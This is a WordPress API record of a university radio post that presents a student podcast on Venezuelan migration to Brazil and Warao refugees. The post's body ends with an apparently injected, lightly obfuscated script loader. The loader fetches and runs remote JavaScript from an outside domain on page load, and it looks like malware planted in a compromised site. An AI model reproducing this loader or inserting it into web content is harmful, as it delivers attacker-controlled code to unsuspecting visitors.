{"id":7574,"date":"2020-09-16T10:00:56","date_gmt":"2020-09-16T13:00:56","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=7574"},"modified":"2025-10-21T10:03:56","modified_gmt":"2025-10-21T13:03:56","slug":"podcast-migracoes","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/","title":{"rendered":"Podcast Migra\u00e7\u00f5es"},"content":{"rendered":"<!--[if lt IE 9]><script>document.createElement('audio');<\/script><![endif]-->\n\t<div class=\"wp-playlist wp-audio-playlist wp-playlist-light\">\n\t\t\t<div class=\"wp-playlist-current-item\"><\/div>\n\t\t<audio controls=\"controls\" preload=\"none\" width=\"1178\"\n\t\t\t><\/audio>\n\t<div class=\"wp-playlist-next\"><\/div>\n\t<div class=\"wp-playlist-prev\"><\/div>\n\t<noscript>\n\t<ol>\n\t\t<li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2020-2\/ESPA\u00c7O%20EXPERIMENTAL%20-%20PODCAST%20MIGRA\u00c7\u00d5ES.mp3'>Espa\u00e7o Experimental - Podcast Migra\u00e7\u00f5es<\/a><\/li>\t<\/ol>\n\t<\/noscript>\n\t<script type=\"application\/json\" class=\"wp-playlist-script\">{\"type\":\"audio\",\"tracklist\":true,\"tracknumbers\":true,\"images\":true,\"artists\":true,\"tracks\":[{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2020-2\\\/ESPA\\u00c7O EXPERIMENTAL - PODCAST MIGRA\\u00c7\\u00d5ES.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"Espa\\u00e7o Experimental - Podcast Migra\\u00e7\\u00f5es\",\"caption\":\"\",\"description\":\"\\\"ESPA\\u00c7O EXPERIMENTAL - PODCAST MIGRA\\u00c7\\u00d5ES\\\". Genre: Other.\",\"meta\":{\"artist\":\"R\\u00e1dio Web UFPA\",\"album\":\"Espa\\u00e7o Experimental\",\"genre\":\"Other\",\"length_formatted\":\"27:11\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}}]}<\/script>\n<\/div>\n\t\n<p>Nesta edi\u00e7\u00e3o, o Espa\u00e7o Experimental apresenta o <strong>podcast Migra\u00e7\u00f5es<\/strong>, que fala sobre as as origens do fluxo migrat\u00f3rio decorrente da crise da Venezuela. O programa recebe como convidada a militante dos Direitos Humanos Leila Silva, que representa o Instituto Trabalho Decente<\/p>\n<p>O epis\u00f3dio traz um panorama a respeito das emigra\u00e7\u00f5es venezuelanas, que ocorrem desde 2016 e foi intensificado em 2017 por conta da crise humanit\u00e1ria no pa\u00eds, al\u00e9m de abordar as estrat\u00e9gias de acolhimento que o Brasil projetou para receber essa popula\u00e7\u00e3o.<\/p>\n<p>O <strong>podcast Migra\u00e7\u00f5es<\/strong> tamb\u00e9m explica as diferen\u00e7as entre os termos imigrantes, repatriados e refugiados e como isso se aplica \u00e0 realidade espec\u00edfica dos ind\u00edgenas Warao, que tem sido acolhidos em diversos estados da regi\u00e3o amaz\u00f4nica. Ao longo do programa, Leila Silva tamb\u00e9m trata dos direitos garantidos aos refugiados, a car\u00eancia de pol\u00edticas e estruturas de apoio aos ind\u00edgenas e os desafios para superar problemas, como a xenofobia.<\/p>\n<p>Esta \u00e9 uma produ\u00e7\u00e3o experimental de estudantes de Jornalismo da Faculdade de Comunica\u00e7\u00e3o da UFPA realizada durante a disciplina Laborat\u00f3rio de Radiojornalismo. O <strong>podcast Migra\u00e7\u00f5es<\/strong> tem a orienta\u00e7\u00e3o da professora \u00c9lida Cristo Miranda e foi produzido pelos alunos Ana Laura Costa, Camila Nunes, Elizabeth Santos,Gabriel Lima, Renan Rocha e Jo\u00e3o Micuanski.<\/p>\n<p>Foto: Jo\u00e3o Gomes \/ Ag\u00eancia Bel\u00e9m<\/p>\n<p>O Espa\u00e7o Experimental vai ao ar na quarta feira, \u00e0s 13h e 22h.<br \/>\nHor\u00e1rios alternativos: Sexta-feira, \u00e0s 13h e s\u00e1bado \u00e0s 09h<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Podcast Migra\u00e7\u00f5es\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/\" aria-label=\"Read more about Podcast Migra\u00e7\u00f5es\">Ler mais<\/a><\/p>\n","protected":false},"author":2,"featured_media":6256,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[161],"tags":[],"class_list":["post-7574","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-espaco-experimental"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Podcast Migra\u00e7\u00f5es - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"O podcast Migra\u00e7\u00f5es aborda as causas do fluxo migrat\u00f3rio da Venezuela e os desafios enfrentados pelos ind\u00edgenas Warao refugiados no Brasil.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Podcast Migra\u00e7\u00f5es - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"O podcast Migra\u00e7\u00f5es aborda as causas do fluxo migrat\u00f3rio da Venezuela e os desafios enfrentados pelos ind\u00edgenas Warao refugiados no Brasil.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2020-09-16T13:00:56+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T13:03:56+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2019\/06\/Ind%C3%ADgenas-Warao.jpg?fit=2000%2C1333&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"2000\" \/>\n\t<meta property=\"og:image:height\" content=\"1333\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Fabr\u00edcio Queiroz\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Fabr\u00edcio Queiroz\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/\"},\"author\":{\"name\":\"Fabr\u00edcio Queiroz\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\"},\"headline\":\"Podcast Migra\u00e7\u00f5es\",\"datePublished\":\"2020-09-16T13:00:56+00:00\",\"dateModified\":\"2025-10-21T13:03:56+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/\"},\"wordCount\":263,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2019\/06\/Ind%C3%ADgenas-Warao.jpg?fit=2000%2C1333&ssl=1\",\"articleSection\":[\"Espa\u00e7o Experimental\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/\",\"name\":\"Podcast Migra\u00e7\u00f5es - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2019\/06\/Ind%C3%ADgenas-Warao.jpg?fit=2000%2C1333&ssl=1\",\"datePublished\":\"2020-09-16T13:00:56+00:00\",\"dateModified\":\"2025-10-21T13:03:56+00:00\",\"description\":\"O podcast Migra\u00e7\u00f5es aborda as causas do fluxo migrat\u00f3rio da Venezuela e os desafios enfrentados pelos ind\u00edgenas Warao refugiados no Brasil.\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2019\/06\/Ind%C3%ADgenas-Warao.jpg?fit=2000%2C1333&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2019\/06\/Ind%C3%ADgenas-Warao.jpg?fit=2000%2C1333&ssl=1\",\"width\":2000,\"height\":1333},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Podcast Migra\u00e7\u00f5es\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\",\"name\":\"Fabr\u00edcio Queiroz\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"caption\":\"Fabr\u00edcio Queiroz\"},\"description\":\"Editor e Jornalista respons\u00e1vel\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Podcast Migra\u00e7\u00f5es - Radio Web UFPA","description":"O podcast Migra\u00e7\u00f5es aborda as causas do fluxo migrat\u00f3rio da Venezuela e os desafios enfrentados pelos ind\u00edgenas Warao refugiados no Brasil.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/","og_locale":"pt_BR","og_type":"article","og_title":"Podcast Migra\u00e7\u00f5es - Radio Web UFPA","og_description":"O podcast Migra\u00e7\u00f5es aborda as causas do fluxo migrat\u00f3rio da Venezuela e os desafios enfrentados pelos ind\u00edgenas Warao refugiados no Brasil.","og_url":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2020-09-16T13:00:56+00:00","article_modified_time":"2025-10-21T13:03:56+00:00","og_image":[{"width":2000,"height":1333,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2019\/06\/Ind%C3%ADgenas-Warao.jpg?fit=2000%2C1333&ssl=1","type":"image\/jpeg"}],"author":"Fabr\u00edcio Queiroz","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Fabr\u00edcio Queiroz","Est. tempo de leitura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/"},"author":{"name":"Fabr\u00edcio Queiroz","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096"},"headline":"Podcast Migra\u00e7\u00f5es","datePublished":"2020-09-16T13:00:56+00:00","dateModified":"2025-10-21T13:03:56+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/"},"wordCount":263,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2019\/06\/Ind%C3%ADgenas-Warao.jpg?fit=2000%2C1333&ssl=1","articleSection":["Espa\u00e7o Experimental"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/","url":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/","name":"Podcast Migra\u00e7\u00f5es - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2019\/06\/Ind%C3%ADgenas-Warao.jpg?fit=2000%2C1333&ssl=1","datePublished":"2020-09-16T13:00:56+00:00","dateModified":"2025-10-21T13:03:56+00:00","description":"O podcast Migra\u00e7\u00f5es aborda as causas do fluxo migrat\u00f3rio da Venezuela e os desafios enfrentados pelos ind\u00edgenas Warao refugiados no Brasil.","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2019\/06\/Ind%C3%ADgenas-Warao.jpg?fit=2000%2C1333&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2019\/06\/Ind%C3%ADgenas-Warao.jpg?fit=2000%2C1333&ssl=1","width":2000,"height":1333},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/podcast-migracoes\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Podcast Migra\u00e7\u00f5es"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096","name":"Fabr\u00edcio Queiroz","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","caption":"Fabr\u00edcio Queiroz"},"description":"Editor e Jornalista respons\u00e1vel","url":"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2019\/06\/Ind%C3%ADgenas-Warao.jpg?fit=2000%2C1333&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-1Ya","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/7574","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=7574"}],"version-history":[{"count":4,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/7574\/revisions"}],"predecessor-version":[{"id":17238,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/7574\/revisions\/17238"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/6256"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=7574"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=7574"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=7574"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}